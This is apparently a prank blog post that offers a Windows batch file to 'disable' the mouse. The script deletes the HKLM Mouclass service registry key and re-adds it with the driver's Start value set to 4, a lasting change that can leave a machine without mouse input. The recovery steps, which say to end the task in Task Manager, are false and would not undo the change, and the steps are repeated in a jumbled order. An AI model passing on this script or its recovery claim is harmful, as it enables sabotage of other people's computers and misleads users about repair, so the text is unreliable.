Hi, Wanna do something crazy. Then, I have an amazing command to disable our mouse.
How To Disable Mouse
1. First, Open Notepad and copy below codes
2. Save this file as Disable.bat
How To Enable :
1. Press 'Ctrl + Alt + Delete'.
2. Now, click on Task manager .
3. And, then End the task .
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
2. Save this file as Disable.bat
3. Now, double click on this file . You have done. Now your mouse will not work.
1. Press 'Ctrl + Alt + Delete'.
2. Now, click on Task manager .
3. And, then End the task .
Post a Comment
Post a Comment